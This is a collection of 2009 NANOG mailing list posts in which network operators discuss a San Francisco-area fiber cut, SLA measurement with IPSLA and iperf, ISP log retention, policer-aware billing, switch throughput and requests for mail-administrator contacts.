 http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

 - - ferg




 --
 Fergie, a.k.a. Paul Ferguson
  Engineering Architecture for the Internet
  fergdawgster(at)gmail.com
  ferg's tech blog: http://fergdawg.blogspot.com/




Re: Fiber cut in SF area

2009-04-11 Thread Chris Adams
Once upon a time, Jo¢ jbfixu...@gmail.com said:
 Yes if enough time goes by anything can happen, but how can one
 argue an ATM machine that has (at times) thousands of dollars stands
 out 24/7 without more immediate wealth. Perhaps I am missing
 something here, do the Cops stake out those areas? dunno

We've had several occasions here where somebody has stolen a backhoe or
front-end loader from a construction site, driven to the nearest ATM,
and loaded the whole ATM into a (usually stolen) truck.

Also, what is the density of outdoor ATMs?  I'm in a suburban area, and
there may be one every mile or two.  How large is the fiber plant?
Miles and miles of continuous fiber, every inch of which is equally
important.  A lot of it here is even on poles, not buried.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: [outages] fibre cut near 200 Paul, San Francisco

2009-04-10 Thread Chris Hills

On 10/04/09 03:32, John Martinez wrote:

BT Americas?


Oh dear, and just after BT suffered a big cut in London. Who needs 
vandals when there's contractors about?


http://www.theregister.co.uk/2009/04/08/bt_hole_hits_vodafone/
http://www.flickr.com/photos/23919...@n00/3426407496/




Re: Fiber cut in SF area

2009-04-09 Thread Chris Cariffe
Monterey Road just north of Blossom Hill, San Jose

On Thu, Apr 9, 2009 at 11:11 AM, Mike Lyon mike.l...@gmail.com wrote:
 Anyone know where the actual cut is?

 On 4/9/09, David W. Hankins david_hank...@isc.org wrote:
 On Thu, Apr 09, 2009 at 08:14:15AM -0700, Craig Holland wrote:
 Just dropping a note that there is a fiber cut in the SF area (I have a
 metro line down).  AboveNet is reporting issues and I've heard unconfirmed
 reports that ATT and VZW are affected as well.

 Confirmed VZW  ATT;

       http://cbs5.com/local/phone.internet.outage.2.980578.html

 Rather widespread general telco outage, the county has deployed
 extra patrol units in the south bay to compensate for not being able
 to call 911.

 Third video link in shows repairs underway.

 --
 David W. Hankins      If you don't do it right the first time,
 Software Engineer                  you'll just have to do it again.
 Internet Systems Consortium, Inc.             -- Jack T. Hankins


 --
 Sent from my mobile device





ATT Mail Administrator

2009-03-27 Thread Chris Wallace
Can someone from ATT contact me off-list with the contact for the mail  
administrator?  We recently got a new CIDR from ARIN and previously  
belonged to Adelphia.  Needless to say, the IPs are pretty much  
blacklisted everywhere as dynamic IP space. I have gotten them pretty  
much cleaned up on other mail servers but I can't get a hold of ATT.   
Any help would be greatly appreciated!


---Chris



Re: Network SLA

2009-03-18 Thread Chris Meidinger

On 18.03.2009, at 12:20, Saqib Ilyas wrote:


I'm back! Thanks again to all those who replied. I am wondering how a
service provider might assess availability or reliability figures using
active measurements. Granted that one could set up traffic generators
between the two PoPs which will be connected to a customer's sites, and then
after a day of test traffic, I can look for downtimes and restoration times.

This is an exact description of IPSLA. Of course you don't know  
whether a maximum bandwidth was in fact available, because you don't  
want to saturate the link.

But a one day estimate is not a good estimate for what the service provider
is promising, which is usually maximum of 10 hours downtime in a year, is
it not?

You need a year of measurement.


Thanks and best regards

On Fri, Mar 13, 2009 at 7:34 PM, Athanasios Douitsis aduit...@gmail.com 
wrote:


Anyone interested in setting up his own IP SLA probes by hand and then
collect the measurements into a database, can use a Perl tool we developed
in 2005:

http://sourceforge.net/projects/saa-collector

It's rather old (SAA got renamed into IPSLA in the meantime) and, in
retrospect, the code is a little rough around the edges, but it's
nevertheless usable.

Regards,
Athanasios




On Wed, Mar 11, 2009 at 10:20 PM, Andreas, Rich 
rich_andr...@cable.comcast.com wrote:


I have found that Cisco IPSLA is heavily used in the MSO/Service
Provider Space.  Juniper has equivalent functionality via RPM.

Rich


-Original Message-
From: Saqib Ilyas [mailto:msa...@gmail.com]
Sent: Saturday, March 07, 2009 6:12 AM
To: nanog@nanog.org
Subject: Re: Network SLA

I must thank everyone who has answered my queries. Just a couple more
short questions.
For instance, if one is using MRTG, and wants to check if we can meet
a 1 Mbps end-to-end throughput between a couple of customer sites, I
believe you would need to use some traffic generator tools, because
MRTG merely imports counters from routers and plots them. Is that
correct?
We've heard of the BRIX active measurement tool in replies to my
earlier email. Also, I've found Cisco IP SLA that also sends traffic
into the service provider network and measures performance. How many
people really use IP SLA feature?
Thanks and best regards

On Mon, Feb 23, 2009 at 1:19 PM, Zartash Uzmi zart...@gmail.com wrote:

As I gather, there is a mix of answers, ranging from building the resources
according to requirements and HOPE for the best to use of arguably
sophisticated tools and perhaps sharing the results with the legal
department.

I would be particularly interested in hearing the service providers'
viewpoint on the following situation.

Consider a service provider with MPLS deployed within its own network.

(A) When the SP enters into a relation with the customer, does the SP
establish new MPLS paths based on customer demands (this is perhaps similar
to building based on requirements as pointed out by David)? If yes,
between what sites/POPs? I assume the answer may be different depending upon
a single-site customer or a customer with multiple sites.

(B) For entering into the relationship for providing X units of bandwidth
(to another site of same customer or to the Tier-1 backbone), does the SP
use any wisdom (in addition to MRTG and the likes)? If so, what scientific
parameters are kept in mind?

(C) How does the customer figure out that a promise for X units of bandwidth
is maintained by the SP? I believe customers may install some measuring
tools but is that really the case in practice?
Thanks,
Zartash

On Fri, Feb 20, 2009 at 1:16 AM, Stefan netfort...@gmail.com wrote:

Saqib Ilyas wrote:

Greetings
I am curious to know about any tools/techniques that a service provider uses
to assess an SLA before signing it. That is to say, how does an
administrator know if he/she can meet what he is promising. Is it based on
experience? Are there commonly used tools for this?
Thanks and best regards

Not necessarily as a direct answer (I am pretty sure there'll be others on
this list giving details in the area of specific tools and standards), but I
think this may be a question (especially considering your end result
concern: *signing the SLA!) equally applicable to your legal department. In
the environment we live, nowadays, the SLA could (should?!? ...
unfortunately) be refined and (at the other end - i.e. receiving)
interpreted by the lawyers, with possibly equal effects (mostly financial
and as overall impact on the business) as the tools we (the technical
people) would be using to measure latency, uptime, bandwidth, jitter,
etc...

Stefan








--
Muhammad Saqib Ilyas
PhD Student, Computer Science and Engineering
Lahore University of Management Sciences









--
Muhammad Saqib Ilyas
PhD Student, Computer Science and Engineering
Lahore University of Management Sciences





Re: Dynamic IP log retention = 0?

2009-03-14 Thread Chris Adams
Once upon a time, Neil kngsp...@gmail.com said:
 I think you are being a little naive.  Port scans, while possibly used for
 malicious ends, can very often be benign.

That sounds naive to me.  From what I've seen, the number of malicious
scans is much greater than the number of benign scans.  The vast
majority of end users have no idea what a port scan is or how to run one
(or how to make sense of the output if they saw one run).

In any case, this isn't really about the port scan.  This is about Covad
claiming they cannot identify who had an IP 48 hours ago.  What if it
wasn't a port scan; what if it was a DoS attack, spamming bot, etc.?

Do you think Covad would respond to a DMCA complaint like that?
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Network SLA

2009-03-07 Thread Chris Meidinger

Saqib,

On 07.03.2009, at 12:12, Saqib Ilyas wrote:


I must thank everyone who has answered my queries. Just a couple more
short questions.
For instance, if one is using MRTG, and wants to check if we can meet
a 1 Mbps end-to-end throughput between a couple of customer sites, I
believe you would need to use some traffic generator tools, because
MRTG merely imports counters from routers and plots them. Is that
correct?


Yes, if you want to do a bandwidth test, iperf should probably be your  
first stop.



We've heard of the BRIX active measurement tool in replies to my
earlier email. Also, I've found Cisco IP SLA that also sends traffic
into the service provider network and measures performance. How many
people really use IP SLA feature?


I know a lot of people that use IPSLA. Remember, that you set it up  
between two routers or higher-end switches and it constantly tests  
that connection. However, IPSLA is the wrong tool for a one-off test  
of whether you can push a Mbps from site A to site B, because you need  
to saturate the link to do that test. IPSLA is great for monitoring  
things like jitter.


HTH,

Chris


Thanks and best regards

On Mon, Feb 23, 2009 at 1:19 PM, Zartash Uzmi zart...@gmail.com wrote:

As I gather, there is a mix of answers, ranging from building the resources
according to requirements and HOPE for the best to use of arguably
sophisticated tools and perhaps sharing the results with the legal
department.

I would be particularly interested in hearing the service providers'
viewpoint on the following situation.

Consider a service provider with MPLS deployed within its own network.

(A) When the SP enters into a relation with the customer, does the SP
establish new MPLS paths based on customer demands (this is perhaps similar
to building based on requirements as pointed out by David)? If yes,
between what sites/POPs? I assume the answer may be different depending upon
a single-site customer or a customer with multiple sites.

(B) For entering into the relationship for providing X units of bandwidth
(to another site of same customer or to the Tier-1 backbone), does the SP
use any wisdom (in addition to MRTG and the likes)? If so, what scientific
parameters are kept in mind?

(C) How does the customer figure out that a promise for X units of bandwidth
is maintained by the SP? I believe customers may install some measuring
tools but is that really the case in practice?

Thanks,
Zartash

On Fri, Feb 20, 2009 at 1:16 AM, Stefan netfort...@gmail.com wrote:


Saqib Ilyas wrote:


Greetings
I am curious to know about any tools/techniques that a service provider uses
to assess an SLA before signing it. That is to say, how does an
administrator know if he/she can meet what he is promising. Is it based on
experience? Are there commonly used tools for this?
Thanks and best regards

Not necessarily as a direct answer (I am pretty sure there'll be others on
this list giving details in the area of specific tools and standards), but I
think this may be a question (especially considering your end result
concern: *signing the SLA!) equally applicable to your legal department. In
the environment we live, nowadays, the SLA could (should?!? ...
unfortunately) be refined and (at the other end - i.e. receiving)
interpreted by the lawyers, with possibly equal effects (mostly financial
and as overall impact on the business) as the tools we (the technical
people) would be using to measure latency, uptime, bandwidth, jitter, etc...


Stefan








--
Muhammad Saqib Ilyas
PhD Student, Computer Science and Engineering
Lahore University of Management Sciences






Re: Usage-Based Billing for DIA

2009-03-05 Thread Chris Adams
Once upon a time, Jon Lewis jle...@lewis.org said:
 1) we have customers on policed ports, and the interface snmp counters 
 count packets before service-policy.  It doesn't seem right to bill for 
 packets we dropped :)...so this isn't useful data for billing purposes.

Not sure how you are policing, but I believe both Juniper and Cisco have
MIBs that show the policed traffic.  For example, when we used Cisco CAR
to limit traffic on some ports, I set up Cricket to monitor both the
base port and the CAR stats (so we could see how much traffic was
actually passed).

I haven't got around to doing it for Juniper firewall policers, but I'm
pretty sure the info is in a MIB.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Yahoo postmaster?

2009-03-03 Thread Chris Adams
Can a Yahoo postmaster ping me off list?  I've got a couple of servers
that appear to be mis-categorized.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Yahoo postmaster?

2009-03-03 Thread Chris Adams
Once upon a time, Matthew Petach mpet...@netflight.com said:
 On 3/3/09, Chris Adams cmad...@hiwaay.net wrote:
  Can a Yahoo postmaster ping me off list?  I've got a couple of servers
   that appear to be mis-categorized.
 
 Contact information for the Yahoo postmasters is listed at
 http://postmaster.yahoo.com/

We've filled out multiple forms there with no response.  That's why I
asked here.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: switch speed question

2009-02-24 Thread Chris Adams
Once upon a time, Roy r.engehau...@gmail.com said:
 I think your math is faulty.  While there may be 24G going in and 24G
 going out, there is only 24G crossing the backplane.  You can't count a
 bit twice (once on in and once on out).  It's the same bit.

Not every bit in results in just one bit out.  Broadcast, multicast,
flooding for unknown MACs (or switching failures), ...
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: comcast price check

2009-02-24 Thread Chris Wallace

How much scheduled downtime was there?

---Chris



On Feb 23, 2009, at 11:46 AM, Justin Wilson - MTIN wrote:

In a Former Life we used Comcast for transport for a school corporation.
In the 3 years we used them we have 10 minutes of unscheduled downtime.



Justin







